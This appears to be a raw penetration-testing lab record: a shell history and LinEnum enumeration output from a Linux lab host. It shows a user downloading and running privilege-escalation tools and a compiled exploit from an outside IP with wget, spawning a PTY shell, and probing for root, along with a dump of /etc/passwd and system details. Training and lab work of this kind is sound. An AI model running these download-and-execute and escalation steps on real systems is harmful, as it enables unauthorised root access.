- cd root
- ls
- cat proof.txt
- uname -a
- setuid id
- setuid
- setid
- access
- setfsuid
- ps -f -u user1
- ps -f -u bob
- ps -eo pid,euid,ruid,suid | grep 2174
- ps -eo pid,euid,ruid,suid | grep 2175
- ps -eo pid,euid,ruid,suid | grep 2203
- setuid(0)
- setuid() ;
- setuid(0)
- setuid('0')
- setuid(1001)
- setuid
- setuid() 1001
- setuid() -h
- man setuid
- seteuid(0)
- seteuid(1001)
- seteuid() ;
- seteuid(getuid())
- seteuid(getuid(1001))
- getenv("SUDO_UID")
- seteuid(0) /bin/bash
- /bin/bash
- $shell
- $ENV
- python
- pyton -c 'import pty;pty.spawn("/bin/bash")'
- python -c 'import pty;pty.spawn("/bin/bash")'
- cd /tmp
- ls
- wget http://10.11.0.86/linenu.sh
- wget http://10.11.0.86:8000/linenu.sh
- wget http://10.11.0.86:8000/linenum.sh
- wget http://10.11.0.86:8000/linuxprivchecker.py
- ls
- bash linenum.sh
- python linuxprivchecker.py
- wget http://10.11.0.86:8000/a.out
- ./a.out
- chmod +x a.out
- ./a.out
- id
- ps
- ps -aux
- ps -eo pid,euid,ruid,suid | grep 2272
- ps -eo pid,euid,ruid,suid | grep 2175
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- ps -eo pid,euid,ruid,suid | grep 2175
- sudo
- sudo -h
- sudo --help
- sudo -l
- nano a.py
- python a.py
- nano a.py
- python a.py
- ps -eo pid,euid,ruid,suid | grep 2175
- ps
- ps -eo pid,euid,ruid,suid | grep 2760
- ps -eo pid,euid,ruid,suid | grep 2893
- ps
- /bin/bash
- /bin/sh
- ls
- python a.py
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
- lsps -efl | grep 'sleep 1' | grep -v gre
- ps -efl | grep 'sleep 1' | grep -v gre
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v
- ps -efl | grep 'sleep 1'
- ps -efl | grep 'sleep 1'
- python a.p
- python a.py
- ls /proc
- cd 2893
- ls
- ls /proc/2893
- ls /proc/2893/fd
- ls /proc/2893/fd/1
- ls /proc/2893/fd/1
- cat /proc/2893/fd/1
- echo n> /proc/2893/fd/1
- echo n >/proc/2893/fd/1
- cat /proc/2893/fd/1
- echo n >/proc/2893/fd/1
- loc
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep|cut -d " " -f 4
- ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $3'}
- ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $4'}
- python a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- whoami
- id
- ps aux
- /bin/sh
- ls
- whoami
- id
- /bin/bash
- [-] Any interesting mail in /var/mail:
- total 8
- drwxrwsr-x 2 root mail 4096 2007-09-05 19:45 .
- drwxr-xr-x 13 root root 4096 2007-09-05 19:45 ..
- ### SCAN COMPLETE ####################################
- #########################################################
- # Local Linux Enumeration & Privilege Escalation Script #
- #########################################################
- # www.rebootuser.com
- # version 0.91
- [-] Debug Info
- [+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)
- Scan started at:
- Wed Aug 8 03:56:00 EDT 2018
- ### SYSTEM ##############################################
- [-] Kernel information:
- Linux sufferance 2.6.30.5-ph33r #1 SMP Sat Aug 29 16:20:59 EDT 2009 i686 GNU/Linux
- [-] Kernel information (continued):
- Linux version 2.6.30.5-ph33r (root@sufference) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Sat Aug 29 16:20:59 EDT 2009
- [-] Hostname:
- sufferance
- ### USER/GROUP ##########################################
- [-] Current user/group info:
- uid=1001(bob) gid=1001(bob) groups=1001(bob)
- [-] Users that have previously logged onto the system:
- Username Port From Latest
- root tty1 Thu Jun 9 07:30:24 -0400 2016
- bob pts/1 10.11.0.86 Wed Aug 8 03:21:49 -0400 2018
- [-] Who else is logged on:
- 03:56:00 up 9:27, 2 users, load average: 0.00, 0.00, 0.00
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- bob pts/0 10.11.0.86 03:14 37:04m 0.00s 0.00s -bash
- bob pts/1 10.11.0.86 03:21 5.00s 0.05s 0.04s bash linenum.sh
- [-] Group memberships:
- uid=0(root) gid=0(root) groups=0(root)
- uid=1(daemon) gid=1(daemon) groups=1(daemon)
- uid=2(bin) gid=2(bin) groups=2(bin)
- uid=3(sys) gid=3(sys) groups=3(sys)
- uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
- uid=5(games) gid=60(games) groups=60(games)
- uid=6(man) gid=12(man) groups=12(man)
- uid=7(lp) gid=7(lp) groups=7(lp)
- uid=8(mail) gid=8(mail) groups=8(mail)
- uid=9(news) gid=9(news) groups=9(news)
- uid=10(uucp) gid=10(uucp) groups=10(uucp)
- uid=13(proxy) gid=13(proxy) groups=13(proxy)
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- uid=34(backup) gid=34(backup) groups=34(backup)
- uid=38(list) gid=38(list) groups=38(list)
- uid=39(irc) gid=39(irc) groups=39(irc)
- uid=41(gnats) gid=41(gnats) groups=41(gnats)
- uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
- uid=100(Debian-exim) gid=102(Debian-exim) groups=102(Debian-exim)
- uid=101(statd) gid=65534(nogroup) groups=65534(nogroup)
- uid=102(identd) gid=65534(nogroup) groups=65534(nogroup)
- uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
- uid=1001(bob) gid=1001(bob) groups=1001(bob)
- [-] Contents of /etc/passwd:
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/bin/sh
- bin:x:2:2:bin:/bin:/bin/sh
- sys:x:3:3:sys:/dev:/bin/sh
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/bin/sh
- man:x:6:12:man:/var/cache/man:/bin/sh
- lp:x:7:7:lp:/var/spool/lpd:/bin/sh
- mail:x:8:8:mail:/var/mail:/bin/sh
- news:x:9:9:news:/var/spool/news:/bin/sh
- uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
- proxy:x:13:13:proxy:/bin:/bin/sh
- www-data:x:33:33:www-data:/var/www:/bin/sh
- backup:x:34:34:backup:/var/backups:/bin/sh
- list:x:38:38:Mailing List Manager:/var/list:/bin/sh
- irc:x:39:39:ircd:/var/run/ircd:/bin/sh
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
- nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
- Debian-exim:x:100:102::/var/spool/exim4:/bin/false
- statd:x:101:65534::/var/lib/nfs:/bin/false
- identd:x:102:65534::/var/run/identd:/bin/false
- sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
- bob:x:1001:1001::/home/bob:/bin/bash
- [-] Super user account(s):
- root
- [+] We can sudo without supplying a password!
- usage: sudo [-HPSb] [-p prompt] [-u username|#uid]
- { -e file [...] | -i | -s | <command> }
- [+] We can read root's home directory!
- total 36K
- drwxr-xr-x 4 root root 4.0K 2016-06-09 07:29 .
- drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
- drwx------ 2 root root 4.0K 2007-09-05 19:55 .aptitude
- -rw------- 1 root root 35 2016-06-09 07:30 .bash_history
- -rw-r--r-- 1 root root 633 2016-04-19 03:53 .bashrc
- -rw-r--r-- 1 root root 110 2004-11-10 11:10 .profile
- ---------- 1 root root 33 2015-02-27 19:33 proof.txt
- drwx------ 2 root root 4.0K 2011-01-29 13:07 .ssh
- -rw------- 1 root root 1 2016-04-19 03:52 .viminfo
- [-] Are permissions on /home directories lax:
- total 12K
- drwxr-xr-x 3 root root 4.0K 2008-10-05 19:21 .
- drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
- drwxr-xr-x 4 bob 1000 4.0K 2011-01-29 13:07 bob
- [-] Root is allowed to login via SSH:
- PermitRootLogin yes
- ### ENVIRONMENTAL #######################################
- [-] Environment information:
- SHELL=/bin/bash
- TERM=xterm-256color
- SSH_CLIENT=10.11.0.86 44278 22
- SSH_TTY=/dev/pts/1
- USER=bob
- PATH=/usr/local/bin:/usr/bin:/bin:/usr/games
- MAIL=/var/mail/bob
- PWD=/tmp
- LANG=en_US.UTF-8
- HOME=/home/bob
- SHLVL=2
- LOGNAME=bob
- SSH_CONNECTION=10.11.0.86 44278 10.11.1.136 22
- _=/usr/bin/env
- [-] Path information:
- /usr/local/bin:/usr/bin:/bin:/usr/games
- [-] Available shells:
- # /etc/shells: valid login shells
- /bin/csh
- /bin/sh
- /usr/bin/es
- /usr/bin/ksh
- /bin/ksh
- /usr/bin/rc
- /usr/bin/tcsh
- /bin/tcsh
- /usr/bin/esh
- /bin/bash
- /bin/rbash
- [-] Current umask value:
- u=rwx,g=rx,o=rx
- 0022
- [-] Password and storage information:
- PASS_MAX_DAYS 99999
- PASS_MIN_DAYS 0
- PASS_WARN_AGE 7
- ### JOBS/TASKS ##########################################
- [-] Cron jobs:
- -rw-r--r-- 1 root root 724 2006-12-19 19:02 /etc/crontab
- /etc/cron.d:
- total 12
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- /etc/cron.daily:
- total 56
- drwxr-xr-x 2 root root 4096 2008-10-07 16:41 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 5041 2007-02-26 16:21 apt
- -rwxr-xr-x 1 root root 314 2007-03-14 10:11 aptitude
- -rwxr-xr-x 1 root root 502 2007-01-02 12:26 bsdmainutils
- -rwxr-xr-x 1 root root 3961 2007-01-20 04:46 exim4-base
- -rwxr-xr-x 1 root root 419 2006-08-06 04:12 find
- -rwxr-xr-x 1 root root 89 2006-04-08 18:16 logrotate
- -rwxr-xr-x 1 root root 946 2007-01-29 07:20 man-db
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 383 2008-05-29 06:21 samba
- -rwxr-xr-x 1 root root 3283 2006-12-19 19:02 standard
- -rwxr-xr-x 1 root root 1307 2006-05-25 05:38 sysklogd
- /etc/cron.hourly:
- total 12
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- /etc/cron.monthly:
- total 16
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 129 2006-12-19 19:02 standard
- /etc/cron.weekly:
- total 20
- drwxr-xr-x 2 root root 4096 2007-09-05 19:54 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 520 2007-01-29 07:20 man-db
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 1092 2006-05-25 05:38 sysklogd
- [-] Crontab contents:
- # /etc/crontab: system-wide crontab
- # Unlike any other crontab you don't have to run the `crontab'
- # command to install the new version when you edit this file
- # and files in /etc/cron.d. These files also have username fields,
- # that none of the other crontabs do.
- SHELL=/bin/sh
- PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
- # m h dom mon dow user command
- 17 * * * * root cd / && run-parts --report /etc/cron.hourly
- 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
- 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
- 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
- #
- ### NETWORKING ##########################################
- [-] Network and IP info:
- eth0 Link encap:Ethernet HWaddr 00:50:56:B8:8E:C5
- inet addr:10.11.1.136 Bcast:10.11.255.255 Mask:255.255.0.0
- inet6 addr: fe80::250:56ff:feb8:8ec5/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:81969 errors:2 dropped:4 overruns:0 frame:0
- TX packets:28019 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:7185584 (6.8 MiB) TX bytes:5028079 (4.7 MiB)
- Interrupt:18 Base address:0x2000
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:16436 Metric:1
- RX packets:18 errors:0 dropped:0 overruns:0 frame:0
- TX packets:18 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:1572 (1.5 KiB) TX bytes:1572 (1.5 KiB)
- [-] Nameserver(s):
- nameserver 10.11.1.220
- nameserver 10.11.1.221
- [-] Listening TCP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
- tcp 0 0 10.11.1.136:445 10.11.0.60:60674 ESTABLISHED-
- tcp6 0 0 :::22 :::* LISTEN -
- tcp6 0 1212 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44278 ESTABLISHED-
- tcp6 0 0 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44154 ESTABLISHED-
- [-] Listening UDP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- udp 0 0 10.11.1.136:137 0.0.0.0:* -
- udp 0 0 0.0.0.0:137 0.0.0.0:* -
- udp 0 0 10.11.1.136:138 0.0.0.0:* -
- udp 0 0 0.0.0.0:138 0.0.0.0:* -
- ### SERVICES #############################################
- [-] Running processes:
- USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
- root 1 0.0 0.0 1940 640 ? Ss Aug07 0:01 init [2]
- root 2 0.0 0.0 0 0 ? S< Aug07 0:00 [kthreadd]
- root 3 0.0 0.0 0 0 ? S< Aug07 0:00 [migration/0]
- root 4 0.0 0.0 0 0 ? S< Aug07 0:00 [ksoftirqd/0]
- root 5 0.0 0.0 0 0 ? S< Aug07 0:00 [watchdog/0]
- root 6 0.0 0.0 0 0 ? S< Aug07 0:00 [events/0]
- root 7 0.0 0.0 0 0 ? S< Aug07 0:00 [cpuset]
- root 8 0.0 0.0 0 0 ? S< Aug07 0:00 [khelper]
- root 13 0.0 0.0 0 0 ? S< Aug07 0:00 [async/mgr]
- root 60 0.0 0.0 0 0 ? S< Aug07 0:00 [kblockd/0]
- root 62 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpid]
- root 63 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpi_notify]
- root 174 0.0 0.0 0 0 ? S< Aug07 0:00 [kseriod]
- root 224 0.0 0.0 0 0 ? S Aug07 0:00 [khungtaskd]
- root 225 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
- root 226 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
- root 227 0.0 0.0 0 0 ? S< Aug07 0:00 [kswapd0]
- root 228 0.0 0.0 0 0 ? S< Aug07 0:00 [aio/0]
- root 229 0.0 0.0 0 0 ? S< Aug07 0:00 [crypto/0]
- bob 705 0.2 0.3 19220 3176 ? S Aug07 1:17 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
- bob 736 0.0 0.3 19220 3176 ? S Aug07 0:27 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
- root 787 0.0 0.0 0 0 ? S< Aug07 0:00 [ata/0]
- root 809 0.0 0.0 0 0 ? S< Aug07 0:00 [ata_aux]
- root 810 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_0]
- root 811 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_1]
- root 954 0.0 0.0 0 0 ? S< Aug07 0:00 [mpt_poll_0]
- root 970 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_2]
- root 1183 0.0 0.2 7668 2224 ? Ss 03:14 0:00 sshd: bob [priv]
- bob 1185 0.0 0.1 7668 1560 ? S 03:14 0:00 sshd: bob@pts/0
- bob 1186 0.0 0.1 4484 1972 pts/0 Ss+ 03:14 0:00 -bash
- root 1194 0.0 0.2 9340 2936 ? S 03:18 0:00 /usr/sbin/smbd -D
- root 1201 0.0 0.0 0 0 ? S< Aug07 0:00 [kjournald]
- root 1482 0.0 0.0 0 0 ? S< Aug07 0:00 [kstriped]
- root 1485 0.0 0.0 0 0 ? S< Aug07 0:00 [ksnapd]
- root 1650 0.0 0.3 33948 3888 ? Sl Aug07 0:22 /usr/sbin/vmtoolsd
- root 1864 0.0 0.0 1620 616 ? Ss Aug07 0:00 /sbin/syslogd
- root 1870 0.0 0.0 1572 372 ? Ss Aug07 0:00 /sbin/klogd -x
- root 1923 0.0 0.2 7668 2220 ? Ss 03:21 0:00 sshd: bob [priv]
- root 1924 0.0 0.0 1568 560 ? Ss Aug07 0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
- bob 1926 0.0 0.1 7828 1568 ? S 03:21 0:00 sshd: bob@pts/1
- bob 1927 0.0 0.1 4476 1924 pts/1 Ss 03:21 0:00 -bash
- 100 1967 0.0 0.0 5308 996 ? Ss Aug07 0:00 /usr/sbin/exim4 -bd -q30m
- root 1981 0.0 0.0 1744 568 ? Ss Aug07 0:00 /usr/sbin/inetd
- root 1988 0.0 0.1 5884 1388 ? Ss Aug07 0:01 /usr/sbin/nmbd -D
- root 1990 0.0 0.2 9052 2532 ? Ss Aug07 0:00 /usr/sbin/smbd -D
- root 1999 0.0 0.1 9052 1092 ? S Aug07 0:00 /usr/sbin/smbd -D
- root 2003 0.0 0.1 4920 1088 ? Ss Aug07 0:00 /usr/sbin/sshd
- root 2030 0.0 0.0 0 0 ? S< Aug07 0:00 [rpciod/0]
- root 2031 0.0 0.0 0 0 ? S< Aug07 0:00 [nfsiod]
- root 2037 0.0 0.0 3504 516 ? Ss Aug07 0:00 /usr/sbin/rpc.idmapd
- daemon 2047 0.0 0.0 1824 408 ? Ss Aug07 0:00 /usr/sbin/atd
- root 2054 0.0 0.0 2188 760 ? Ss Aug07 0:00 /usr/sbin/cron
- root 2087 0.0 0.0 1568 492 tty1 Ss+ Aug07 0:00 /sbin/getty 38400 tty1
- root 2088 0.0 0.0 1568 492 tty2 Ss+ Aug07 0:00 /sbin/getty 38400 tty2
- root 2089 0.0 0.0 1568 488 tty3 Ss+ Aug07 0:00 /sbin/getty 38400 tty3
- root 2090 0.0 0.0 1568 492 tty4 Ss+ Aug07 0:00 /sbin/getty 38400 tty4
- root 2091 0.0 0.0 1568 488 tty5 Ss+ Aug07 0:00 /sbin/getty 38400 tty5
- root 2092 0.0 0.0 1568 488 tty6 Ss+ Aug07 0:00 /sbin/getty 38400 tty6
- bob 2104 0.8 0.2 4900 2204 pts/1 S+ 03:55 0:00 bash linenum.sh
- bob 2464 1.0 0.1 4916 1840 pts/1 R+ 03:55 0:00 bash linenum.sh
- bob 2466 0.0 0.0 2744 504 pts/1 S+ 03:55 0:00 tee -a
- bob 2645 0.0 0.1 4916 1604 pts/1 R+ 03:56 0:00 bash linenum.sh
- bob 2646 0.0 0.0 3424 980 pts/1 R+ 03:56 0:00 ps aux
- [-] Process binaries and associated permissions (from above list):
- 16K -rwxr-xr-x 1 root root 15K 2007-02-21 12:48 /sbin/getty
- 24K -rwxr-xr-x 1 root root 23K 2006-05-25 05:38 /sbin/klogd
- 28K -rwxr-xr-x 1 root root 28K 2006-05-25 05:38 /sbin/syslogd
- 696K -rwxr-xr-x 2 root root 689K 2015-02-27 19:06 /usr/lib/vmware-tools/sbin32/vmtoolsd
- 20K -rwxr-xr-x 1 root root 18K 2006-01-15 16:24 /usr/sbin/acpid
- 16K -rwxr-xr-x 1 root root 16K 2006-01-03 02:15 /usr/sbin/atd
- 32K -rwxr-xr-x 1 root root 31K 2006-12-19 19:02 /usr/sbin/cron
- 676K -rwsr-xr-x 1 root root 672K 2007-01-20 04:46 /usr/sbin/exim4
- 32K -rwxr-xr-x 1 root root 29K 2007-03-21 14:12 /usr/sbin/inetd
- 900K -rwxr-xr-x 1 root root 893K 2008-05-29 06:21 /usr/sbin/nmbd
- 36K -rwxr-xr-x 1 root root 35K 2007-05-16 06:41 /usr/sbin/rpc.idmapd
- 3.1M -rwxr-xr-x 1 root root 3.1M 2008-05-29 06:21 /usr/sbin/smbd
- 316K -rwxr-xr-x 1 root root 312K 2007-03-05 11:38 /usr/sbin/sshd
- 0 lrwxrwxrwx 1 root root 37 2015-02-27 19:06 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
- [-] Contents of /etc/inetd.conf:
- # /etc/inetd.conf: see inetd(8) for further informations.
- #
- # Internet superserver configuration database
- #
- #
- # Lines starting with "#:LABEL:" or "#<off>#" should not
- # be changed unless you know what you are doing!
- #
- # If you want to disable an entry so it isn't touched during
- # package updates just comment it out with a single '#' character.
- #
- # Packages should modify this file by using update-inetd(8)
- #
- # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
- #
- #:INTERNAL: Internal services
- #discard stream tcp nowait root internal
- #discard dgram udp wait root internal
- #daytime stream tcp nowait root internal
- #time stream tcp nowait root internal
- #:STANDARD: These are standard services.
- #:BSD: Shell, login, exec and talk are BSD protocols.
- #:MAIL: Mail, news and uucp services.
- #:INFO: Info services
- ident stream tcp wait identd /usr/sbin/identd identd
- #:BOOT: TFTP service is provided primarily for booting. Most sites
- # run this only on machines acting as "boot servers."
- #:RPC: RPC based services
- #:HAM-RADIO: amateur-radio services
- #:OTHER: Other services
- #<off># netbios-ssn stream tcp nowait root /usr/sbin/tcpd /usr/sbin/smbd
- [-] The related inetd binary permissions:
- -rwxr-xr-x 1 root root 4280 2007-02-25 15:06 /usr/sbin/tcpd
- [-] /etc/init.d/ binary permissions:
- total 332
- drwxr-xr-x 2 root root 4096 2015-02-27 19:06 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 1850 2006-01-14 06:12 acpid
- -rwxr-xr-x 1 root root 969 2006-01-03 02:15 atd
- -rwxr-xr-x 1 root root 5089 2006-09-20 07:33 bootclean
- -rwxr-xr-x 1 root root 2146 2006-09-12 17:30 bootlogd
- -rwxr-xr-x 1 root root 1915 2006-09-20 07:27 bootmisc.sh
- -rwxr-xr-x 1 root root 2930 2006-09-14 04:20 checkfs.sh
- -rwxr-xr-x 1 root root 9548 2006-09-23 03:34 checkroot.sh
- -rwxr-xr-x 1 root root 6110 2006-09-05 12:15 console-screen.sh
- -rwxr-xr-x 1 root root 1761 2006-10-12 14:55 cron
- -rwxr-xr-x 1 root root 7104 2007-01-18 12:45 exim4
- -rwxr-xr-x 1 root root 5823 2007-07-30 16:39 glibc.sh
- -rwxr-xr-x 1 root root 1360 2007-01-13 13:52 halt
- -rwxr-xr-x 1 root root 1287 2006-09-12 17:31 hostname.sh
- -rwxr-xr-x 1 root root 3886 2007-02-21 12:48 hwclock.sh
- -rwxr-xr-x 1 root root 2518 2006-09-15 14:03 ifupdown
- -rwxr-xr-x 1 root root 1046 2006-09-15 14:03 ifupdown-clean
- -rwxr-xr-x 1 root root 3484 2006-10-15 23:38 keymap.sh
- -rwxr-xr-x 1 root root 944 2006-09-12 17:31 killprocs
- -rwxr-xr-x 1 root root 1375 2006-05-25 05:38 klogd
- -rwxr-xr-x 1 root root 417 2006-08-08 18:38 libdevmapper1.02
- -rwxr-xr-x 1 root root 1054 2006-09-06 17:43 makedev
- -rwxr-xr-x 1 root root 1793 2006-11-14 06:12 module-init-tools
- -rwxr-xr-x 1 root root 617 2006-01-15 06:04 mountall-bootclean.sh
- -rwxr-xr-x 1 root root 1718 2006-09-12 17:30 mountall.sh
- -rwxr-xr-x 1 root root 2206 2006-10-03 14:22 mountdevsubfs.sh
- -rwxr-xr-x 1 root root 2394 2006-09-25 04:36 mountkernfs.sh
- -rwxr-xr-x 1 root root 615 2006-01-15 06:04 mountnfs-bootclean.sh
- -rwxr-xr-x 1 root root 2299 2006-11-26 08:35 mountnfs.sh
- -rwxr-xr-x 1 root root 3668 2006-11-26 10:13 mtab.sh
- -rwxr-xr-x 1 root root 1898 2007-01-16 04:06 nbd-server
- -rwxr-xr-x 1 root root 2550 2007-01-06 10:36 networking
- -rwxr-xr-x 1 root root 6644 2007-05-16 06:41 nfs-common
- -rwxr-xr-x 1 root root 4340 2007-05-16 06:41 nfs-kernel-server
- -rwxr-xr-x 1 root root 1241 2006-10-09 08:29 nfs-user-server
- -rwxr-xr-x 1 root root 2324 2007-02-25 15:29 openbsd-inetd
- -rwxr-xr-x 1 root root 1525 2006-12-22 03:15 portmap
- -rwxr-xr-x 1 root root 997 2006-09-12 21:42 procps.sh
- -rwxr-xr-x 1 root root 8045 2006-11-27 17:23 rc
- -rwxr-xr-x 1 root root 798 2006-09-28 13:25 rc.local
- -rwxr-xr-x 1 root root 480 2012-01-22 07:06 rc.py
- -rwxr-xr-x 1 root root 117 2005-12-02 12:44 rcS
- -rw-r--r-- 1 root root 1386 2006-09-13 02:10 README
- -rwxr-xr-x 1 root root 655 2006-09-22 10:21 reboot
- -rwxr-xr-x 1 root root 994 2006-09-12 17:30 rmnologin
- -rwxr-xr-x 1 root root 2153 2008-05-29 06:10 samba
- -rwxr-xr-x 1 root root 1376 2006-11-27 17:23 sendsigs
- -rwxr-xr-x 1 root root 585 2006-09-12 17:32 single
- -rw-r--r-- 1 root root 4187 2006-09-12 17:32 skeleton
- -rwxr-xr-x 1 root root 1891 2007-03-05 11:38 ssh
- -rwxr-xr-x 1 root root 520 2006-09-12 17:26 stop-bootlogd
- -rwxr-xr-x 1 root root 730 2006-10-02 13:14 stop-bootlogd-single
- -rwxr-xr-x 1 root root 541 2006-04-06 15:58 sudo
- -rwxr-xr-x 1 root root 2037 2006-05-25 05:38 sysklogd
- -rw-r--r-- 1 root root 8178 2006-12-19 05:21 udev
- -rw-r--r-- 1 root root 1252 2006-03-28 02:44 udev-mtab
- -rwxr-xr-x 1 root root 3175 2006-11-25 04:22 umountfs
- -rwxr-xr-x 1 root root 2128 2006-11-26 13:23 umountnfs.sh
- -rwxr-xr-x 1 root root 1122 2006-09-30 10:37 umountroot
- -rwxr-xr-x 1 root root 1815 2006-09-12 17:30 urandom
- -rwxr-xr-x 1 root root 41912 2015-02-27 19:06 vmware-tools
- ### SOFTWARE #############################################
- [-] Sudo version:
- Sudo version 1.6.8p12
- ### INTERESTING FILES ####################################
- [-] Useful file locations:
- /bin/nc
- /bin/netcat
- /usr/bin/wget
- /usr/bin/gcc
- [-] Installed compilers:
- ii gcc 4.1.1-15 The GNU C compiler
- ii gcc-4.1 4.1.1-21 The GNU C compiler
- [-] Can we read/write sensitive files:
- -rw-r--r-- 1 root root 945 2008-10-07 16:34 /etc/passwd
- -rw-r--r-- 1 root root 503 2008-10-05 19:21 /etc/group
- -rw-r--r-- 1 root root 475 2006-10-28 09:42 /etc/profile
- -rw-r----- 1 root shadow 680 2016-06-09 07:29 /etc/shadow
- [-] NFS config details:
- -rw-r--r-- 1 root root 1 2008-10-11 14:30 /etc/exports
- [-] Can't search *.conf files as no keyword was entered
- [-] Can't search *.php files as no keyword was entered
- [-] Can't search *.log files as no keyword was entered
- [-] Can't search *.ini files as no keyword was entered
- [-] All *.conf files in /etc (recursive 1 level):
- -rw-r--r-- 1 root root 1183 2008-10-07 16:41 /etc/inetd.conf
- -rw-r--r-- 1 root root 624 2006-07-07 22:43 /etc/mtools.conf
- -rw-r--r-- 1 root root 240 2007-09-05 20:01 /etc/kernel-img.conf
- -rw-r--r-- 1 root root 899 2006-10-29 10:27 /etc/gssapi_mech.conf
- -rw-r--r-- 1 root root 599 2005-09-03 08:49 /etc/logrotate.conf
- -rw-r--r-- 1 root root 2555 2004-12-06 08:59 /etc/reportbug.conf
- -rw-r--r-- 1 root root 1260 2007-02-25 14:30 /etc/ucf.conf
- -rw-r--r-- 1 root root 149 2007-09-05 20:29 /etc/modules.conf
- -rw-r--r-- 1 root root 9 2006-08-07 13:14 /etc/host.conf
- -rw-r--r-- 1 root root 330 2007-03-06 21:17 /etc/mke2fs.conf
- -rw-r--r-- 1 root root 475 2006-08-28 12:33 /etc/nsswitch.conf
- -rw-r--r-- 1 root root 145 2007-09-05 20:00 /etc/idmapd.conf
- -rw-r--r-- 1 root root 552 2004-07-31 16:34 /etc/pam.conf
- -rw-r--r-- 1 root root 2673 2006-12-20 14:31 /etc/debconf.conf
- -rw-r--r-- 1 root root 600 2007-01-19 02:25 /etc/deluser.conf
- -rw-r--r-- 1 root root 33 2007-09-05 19:45 /etc/ld.so.conf
